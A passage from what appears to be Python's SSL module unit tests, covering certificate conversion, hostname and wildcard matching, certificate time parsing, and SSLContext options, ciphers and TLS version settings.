d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# a wildcard in the first fragment combined with IDNA A-labels in
# subsequent fragments is not supported (all of these must fail).
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
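# VERIFY_X509_TRUSTED_FIRST is only exposed when the underlying OpenSSL build
# supports it, hence the getattr() fallback to 0; recent OpenSSL versions are
# believed to enable trusted-first chain building by default.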
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# arbitrary combinations of flags are accepted
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
